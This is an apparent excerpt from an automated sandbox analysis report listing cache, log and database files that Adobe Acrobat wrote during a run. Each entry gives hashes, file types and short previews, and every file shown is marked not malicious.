                                                                                                                                              SSDEEP:6:iOG75ypM+q2PsHO2nKuAl9Ombzo2jMGIFUto78KqZmwC78K1MVkwOsHO2nKuAl97:7GuM+vkHVHAa8uFUto9q/C91MV51HVHA
                                                                                                                                              MD5:ACCEC216A2401673E69D43BF9C4F35FE
                                                                                                                                              SHA1:412D82E945A42D7763BCE4BA6FD9E6F76C7A4445
                                                                                                                                              SHA-256:4D844FAFD6149D82FB352C277F2AC28D91672279CD4F7FE8692E4D95B5F5DFF1
                                                                                                                                              SHA-512:91CF08D9AAD7E0886FB5D881719BB26D79D8A72C77B3142F5F85897AF26545DFF6AD77242A2DB8DCDBFECE7D16F17123EED2C49D449DDF1B2F2153DEA40B520A
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:2025/03/17-16:56:59.695 16fc Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2025/03/17-16:56:59.698 16fc Recovering log #3.2025/03/17-16:56:59.698 16fc Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .

                                                                                                                                              C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG.old (copy)

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                                                              File Type:ASCII text
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):338
                                                                                                                                              Entropy (8bit):5.215699948539294
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:6:iOG75ypM+q2PsHO2nKuAl9Ombzo2jMGIFUto78KqZmwC78K1MVkwOsHO2nKuAl97:7GuM+vkHVHAa8uFUto9q/C91MV51HVHA
                                                                                                                                              MD5:ACCEC216A2401673E69D43BF9C4F35FE
                                                                                                                                              SHA1:412D82E945A42D7763BCE4BA6FD9E6F76C7A4445
                                                                                                                                              SHA-256:4D844FAFD6149D82FB352C277F2AC28D91672279CD4F7FE8692E4D95B5F5DFF1
                                                                                                                                              SHA-512:91CF08D9AAD7E0886FB5D881719BB26D79D8A72C77B3142F5F85897AF26545DFF6AD77242A2DB8DCDBFECE7D16F17123EED2C49D449DDF1B2F2153DEA40B520A
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:2025/03/17-16:56:59.695 16fc Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2025/03/17-16:56:59.698 16fc Recovering log #3.2025/03/17-16:56:59.698 16fc Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .

                                                                                                                                              C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\Network Persistent State (copy)

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                                                              File Type:JSON data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):476
                                                                                                                                              Entropy (8bit):4.977354820075707
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:12:YH/um3RA8sqoYGsBdOg2Hdfcaq3QYiubEP7E4T3y:Y2sRdsGLdMHI3QYhbY7nby
                                                                                                                                              MD5:A0EAB967F8A91B0B164F55AA5F79944E
                                                                                                                                              SHA1:CED6ECEE010C8BD5452280163E443D911E131C2E
                                                                                                                                              SHA-256:069ECC1186FCAB3A68BDC6A2237ADB7E5BFB1E14ADA41578B2682B5C9D333205
                                                                                                                                              SHA-512:6E4068C5CD509BC5C8FD67103915729AF56199CD3CA9DCE6599EEF9D7ACE259330800ED03A8612742B3C8DF4DA26678CF69E12130AFBD6B79E98E691BCFD39F7
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13386805031567932","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":158124},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.17","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G"}}}

                                                                                                                                              C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\b9817c59-f101-4254-add7-7e12eb3891cf.tmp

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                                                              File Type:JSON data
                                                                                                                                              Category:modified
                                                                                                                                              Size (bytes):476
                                                                                                                                              Entropy (8bit):4.977354820075707
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:12:YH/um3RA8sqoYGsBdOg2Hdfcaq3QYiubEP7E4T3y:Y2sRdsGLdMHI3QYhbY7nby
                                                                                                                                              MD5:A0EAB967F8A91B0B164F55AA5F79944E
                                                                                                                                              SHA1:CED6ECEE010C8BD5452280163E443D911E131C2E
                                                                                                                                              SHA-256:069ECC1186FCAB3A68BDC6A2237ADB7E5BFB1E14ADA41578B2682B5C9D333205
                                                                                                                                              SHA-512:6E4068C5CD509BC5C8FD67103915729AF56199CD3CA9DCE6599EEF9D7ACE259330800ED03A8612742B3C8DF4DA26678CF69E12130AFBD6B79E98E691BCFD39F7
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13386805031567932","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":158124},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.17","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G"}}}

                                                                                                                                              C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\000003.log

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):6495
                                                                                                                                              Entropy (8bit):5.242176803058066
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:192:TUi8h+F8Aj8DRCGwtqzmsLnNreR2ZpjRe4I8qr9jnNI92D3jC+3ETKEAE8uk0I8c:jX8eQxTM
                                                                                                                                              MD5:60B604FDE5C8A9674D7CF5A0758FDF96
                                                                                                                                              SHA1:75F27BA748B91DF1AA1140040C8CF4916FE0F798
                                                                                                                                              SHA-256:32CD9C9AE534EDD9C1D194D735E7057556C180E326B02B757EE4856B94FD471D
                                                                                                                                              SHA-512:B0ABDF2ABEA109D4A755F90C214C01118F202F5C40944BD5CBBCEC84F09282A41D74ECEC5C135461001E9460120A10F1199AB3F151CE006BEEF6F7B8E850A388
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:*...#................version.1..namespace-....o................next-map-id.1.Pnamespace-42000ee3_e7f8_4e1a_acf9_c35e414a379e-https://rna-resource.acrobat.com/.0F...r................next-map-id.2.Snamespace-c3e8f6d4_f714_436a_92db_f0a4810aae6e-https://rna-v2-resource.acrobat.com/.1.p..r................next-map-id.3.Snamespace-d0743b68_de08_4f3c_b7bc_aca178ee7ff1-https://rna-v2-resource.acrobat.com/.2....o................next-map-id.4.Pnamespace-ce27b6a8_7896_4616_ab45_36a5ede234ad-https://rna-resource.acrobat.com/.3..).^...............Pnamespace-42000ee3_e7f8_4e1a_acf9_c35e414a379e-https://rna-resource.acrobat.com/...^...............Pnamespace-ce27b6a8_7896_4616_ab45_36a5ede234ad-https://rna-resource.acrobat.com/.{VUa...............Snamespace-c3e8f6d4_f714_436a_92db_f0a4810aae6e-https://rna-v2-resource.acrobat.com/....a...............Snamespace-d0743b68_de08_4f3c_b7bc_aca178ee7ff1-https://rna-v2-resource.acrobat.com/yATuo................next-map-id.5.Pnamespace-eb3aef6d_d129_430c_a353_

                                                                                                                                              C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                                                              File Type:ASCII text
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):326
                                                                                                                                              Entropy (8bit):5.244698690156933
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:6:iOG7CpM+q2PsHO2nKuAl9OmbzNMxIFUto78ZmwC71c1MVkwOsHO2nKuAl9OmbzNq:7G2pM+vkHVHAa8jFUtoQ/CiMV51HVHAo
                                                                                                                                              MD5:231A806A4832DD8F8DAFDAE57464C289
                                                                                                                                              SHA1:ECB4771864EF541C1829B15E72A9690D5D135ABA
                                                                                                                                              SHA-256:9BD8659081FC3693557B8C4B4C0EB845B091C143D2247746DE77DEC0B6F657F7
                                                                                                                                              SHA-512:3E3945C86B87512F21DFA89264ADB96DE00017BA635D2C2205243820FF8BFDDCE8B58053DEFC32C4BC8D01392596F82D1EDEC4C76F11CEAC97D4E3BC6FE7FF6E
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:2025/03/17-16:56:59.837 16fc Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2025/03/17-16:56:59.838 16fc Recovering log #3.2025/03/17-16:56:59.840 16fc Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .

                                                                                                                                              C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG.old (copy)

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                                                              File Type:ASCII text
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):326
                                                                                                                                              Entropy (8bit):5.244698690156933
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:6:iOG7CpM+q2PsHO2nKuAl9OmbzNMxIFUto78ZmwC71c1MVkwOsHO2nKuAl9OmbzNq:7G2pM+vkHVHAa8jFUtoQ/CiMV51HVHAo
                                                                                                                                              MD5:231A806A4832DD8F8DAFDAE57464C289
                                                                                                                                              SHA1:ECB4771864EF541C1829B15E72A9690D5D135ABA
                                                                                                                                              SHA-256:9BD8659081FC3693557B8C4B4C0EB845B091C143D2247746DE77DEC0B6F657F7
                                                                                                                                              SHA-512:3E3945C86B87512F21DFA89264ADB96DE00017BA635D2C2205243820FF8BFDDCE8B58053DEFC32C4BC8D01392596F82D1EDEC4C76F11CEAC97D4E3BC6FE7FF6E
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:2025/03/17-16:56:59.837 16fc Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2025/03/17-16:56:59.838 16fc Recovering log #3.2025/03/17-16:56:59.840 16fc Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .

                                                                                                                                              C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\shared_proto_db\000001.dbtmp

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                                                              File Type:ASCII text
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):16
                                                                                                                                              Entropy (8bit):3.2743974703476995
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                              MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                              SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                              SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                              SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:MANIFEST-000001.

                                                                                                                                              C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\shared_proto_db\000003.log

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):53
                                                                                                                                              Entropy (8bit):4.2634772217299695
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:3:GA+klXt1HcZUV/TgllGRn:GARtVnV8gR
                                                                                                                                              MD5:4E4EB7B69AF56C6CB6091C17CF3A5ACA
                                                                                                                                              SHA1:477DA569B1EB13A18443A1EAA37058534ADAACD8
                                                                                                                                              SHA-256:CDEF2FCB02A6C8952673116D5971B3276D3428056FDC9738FBD0D0A69EB5DF63
                                                                                                                                              SHA-512:5FD569389E52D2CB43DB54CF85410F79A054D9896D24F6808A69F4D9D44DB8A8DF65B6FC5FF18ACEB143EE092CF9B285E7EF570523ADE63C489104BF023E5443
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:.....................22_11|360x240|60..x....9Rj7V^ZyB

                                                                                                                                              C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\shared_proto_db\CURRENT (copy)

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                                                              File Type:ASCII text
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):16
                                                                                                                                              Entropy (8bit):3.2743974703476995
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                              MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                              SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                              SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                              SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:MANIFEST-000001.

                                                                                                                                              C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\shared_proto_db\LOG

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                                                              File Type:ASCII text
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):283
                                                                                                                                              Entropy (8bit):5.170739561479589
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:6:iOG7MDv81sHO2nKuAl9OmbzfXkrl2KLl47MDa2cM+q2PsHO2nKuAl9OmbzfXkrKQ:7GIzHVHAa8/uLCI3+vkHVHAa8/F3FUv
                                                                                                                                              MD5:F9E1C4C324307FAEF44BF70ED234D548
                                                                                                                                              SHA1:4213426022E00E8270CDAC08FD77F641C25CC337
                                                                                                                                              SHA-256:BFBF9D0732D68B5A400CF00688A30478AB91F4A6736FEC0CBA96EC8EA5070117
                                                                                                                                              SHA-512:E3FCE5B38751B3B8EA9F904B0588B9B7D24048CA9029DA40F81F44BB131BF0AEB5F145691C92A7A0337548D9637C004EDF6EB6AE6EFDDDB36916B4C841CDC704
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:2025/03/17-16:57:08.710 a1c Creating DB C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\shared_proto_db since it was missing..2025/03/17-16:57:08.722 a1c Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\shared_proto_db/MANIFEST-000001.

                                                                                                                                              C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\shared_proto_db\MANIFEST-000001

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                                                              File Type:OpenPGP Secret Key
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):41
                                                                                                                                              Entropy (8bit):4.704993772857998
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                              MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                              SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                              SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                              SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:.|.."....leveldb.BytewiseComparator......

                                                                                                                                              C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\shared_proto_db\metadata\000001.dbtmp

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                                                              File Type:ASCII text
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):16
                                                                                                                                              Entropy (8bit):3.2743974703476995
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                              MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                              SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                              SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                              SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:MANIFEST-000001.

                                                                                                                                              C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\shared_proto_db\metadata\000003.log

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):126
                                                                                                                                              Entropy (8bit):3.6123534208443075
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:3:G0XttkJcsRwI9tkJcsSaJkG3mH2lztzlkzXlfmH2lG:G0XtqcsqczaJf3mH2lztzl4mH2lG
                                                                                                                                              MD5:A05963DD9E2C7C3F13C18A9245AD5934
                                                                                                                                              SHA1:15A87493591860C6C22499DF3A705ACB3CB466BD
                                                                                                                                              SHA-256:F40B7EF0FE0B676871403B8DD21CE42AF8E482DC8B81F09D93CB2C48CCD112B4
                                                                                                                                              SHA-512:E67833950A3DB8D4C27FC851C7DF9AEBB85699024F805E98A2951E9E9FC3B606F10EAD23CE0A3B97484A18A9A52520540FB29787178BFEB9FBD8D46D0AA492A2
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:.h.6.................__global... .t...................__global... ..7..................22_......u...................22_.....

                                                                                                                                              C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\shared_proto_db\metadata\CURRENT (copy)

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                                                              File Type:ASCII text
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):16
                                                                                                                                              Entropy (8bit):3.2743974703476995
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                              MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                              SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                              SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                              SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:MANIFEST-000001.

                                                                                                                                              C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\shared_proto_db\metadata\LOG

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                                                              File Type:ASCII text
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):301
                                                                                                                                              Entropy (8bit):5.161844964493124
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:6:iOG7MDTc0GR1sHO2nKuAl9OmbzfXkrzs52KLl47MDAM+q2PsHO2nKuAl9OmbzfXj:7GITc/wHVHAa8/N9LCIp+vkHVHAa8/ig
                                                                                                                                              MD5:9A54854393074F30C72F8E11B47DAEA4
                                                                                                                                              SHA1:5424918E828AD63154EED2F72BCE4E647169C0F4
                                                                                                                                              SHA-256:C18DDDECED7E1807056866BC3A960BA0BA9567765C085E21598CE9EB004178CA
                                                                                                                                              SHA-512:12527470D2FAC007F67ABA58717891B38215E0E6A497CAB42DF86FA4022928FF44D6D78B15B8DF7CBDF2559051B65D842F2657C4FF15EEDEE7D524B4D0090B59
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:2025/03/17-16:57:08.693 a1c Creating DB C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\shared_proto_db\metadata since it was missing..2025/03/17-16:57:08.706 a1c Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\shared_proto_db\metadata/MANIFEST-000001.

                                                                                                                                              C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\shared_proto_db\metadata\MANIFEST-000001

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                                                              File Type:OpenPGP Secret Key
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):41
                                                                                                                                              Entropy (8bit):4.704993772857998
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                              MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                              SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                              SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                              SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:.|.."....leveldb.BytewiseComparator......

                                                                                                                                              C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ConnectorIcons\icon-250317205703Z-167.bmp

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                              File Type:PC bitmap, Windows 3.x format, 107 x -152 x 32, cbSize 65110, bits offset 54
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):65110
                                                                                                                                              Entropy (8bit):1.8575040927808066
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:192:Fn0XrgO0f44spShlMrsIxfzRpRChiHAUuipDpM07tR:F0XrlE44spShlMrfzRpRChiHjpMuz
                                                                                                                                              MD5:7E65E5C7F41668E2F9CCEF5A58839662
                                                                                                                                              SHA1:1493FC56E04DC149E7EB248043E1787F72A61449
                                                                                                                                              SHA-256:D502A37DBA5A2520EAECCC98EBE0E76357E82B9FE4628A33AD03112C19FF42CC
                                                                                                                                              SHA-512:D985475CCFFC6917155FF848770E51CF82E98158714726215ADEDC2A25A022F86EB461A0301592A2A02C88960C3D541BCA142AD52CA7AE76C6ED35D2091A03CD
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:BMV.......6...(...k...h..... ...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                              C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 11, database pages 21, cookie 0x5, schema 4, UTF-8, version-valid-for 11
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):86016
                                                                                                                                              Entropy (8bit):4.444814845590365
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:384:yeZci5thiBA7aDQPsknQ0UNCFOa14ocOUw6zyFzqFkdZ+EUTTcdUZ5yDQhJL:Fys3OazzU89UTTgUL
                                                                                                                                              MD5:AEDC29EDB062485530D31E7207BA5AE2
                                                                                                                                              SHA1:E642C5E337D29A7539EF963CAEB943303BB56BB7
                                                                                                                                              SHA-256:CBCCE055E1A6B2EAEA5BFFB2D0F95033C467CF70A862F76E93D2F38060BD7C46
                                                                                                                                              SHA-512:06319D34E1BF431CFC8143570DF943174EA9E1E9B01CC40042003D51FF8CA09105E080EF6AE781F2ACC77E31E929FA71325631EECC6BA03FC961B69FF8AFC665
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:SQLite format 3......@ ..........................................................................c.......1........T...U.1.D............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                              C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages-journal

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                              File Type:SQLite Rollback Journal
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):8720
                                                                                                                                              Entropy (8bit):3.768158929744586
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:48:7MjJioyVVioyhoy1C7oy16oy1TKOioy1noy1AYoy1Wioy1oioykioyBoy1noy1Of:7oJuVb2XjBibb9IVXEBodRBkY
                                                                                                                                              MD5:414A80766B16B1CB436B5401FF098642
                                                                                                                                              SHA1:0A23FFDF880324A34E57ACB83F46D2E6C35FBB39
                                                                                                                                              SHA-256:73E076FCA11BBF8A897B17068CB5BECFAF44483DE68CC05DA62FBEB969ED0CE8
                                                                                                                                              SHA-512:8DD5FF048D0F495C4EE30B3EA5F63C24F1730E1C35993880840D46122ACE1ED12C8A668E912986B628E43D6FA84FDA8B1F0A666A7EEE025CF6438A302867D37B
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:.... .c.....S../...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................T...[...b.r.l...t...}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                              C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\ACROBAT_READER_MASTER_SURFACEID

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                              File Type:JSON data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):295
                                                                                                                                              Entropy (8bit):5.353803336975253
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:6:YEQXJ2HXpHPXtjx6mJ0YWxQdpieoAvJM3g98kUwPeUkwRe9:YvXKXpPtjx6mHDiVGMbLUkee9
                                                                                                                                              MD5:04DA7D826B6D9E3B0CFA040C939DEC2F
                                                                                                                                              SHA1:0269C61ADEF068FB30E578F844B89386A697644D
                                                                                                                                              SHA-256:631E182B38F7B0CE8BF6BE59179B27FE0AB1E4EB2298975516BAD3FF20779D3C
                                                                                                                                              SHA-512:406822F666288DBD5A3B6E19F6948D2CDC7861556DABE986B4E40E11F49F4130BFFEA5C6A765F524520E3A5BB65961A83E019B6F5D021D2657393C82D3ECA0A7
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:{"analyticsData":{"responseGUID":"5a368302-ab4e-4d47-b078-955212ec572b","sophiaUUID":"94B2C178-E1F7-4D12-8BEA-76F4017C8DA0"},"encodingScheme":true,"expirationDTS":1742422085858,"statusCode":200,"surfaceID":"ACROBAT_READER_MASTER_SURFACEID","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                                                                                              C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Home_View_Surface

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                              File Type:JSON data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):294
                                                                                                                                              Entropy (8bit):5.302878052979207
                                                                                                                                              Encrypted:false
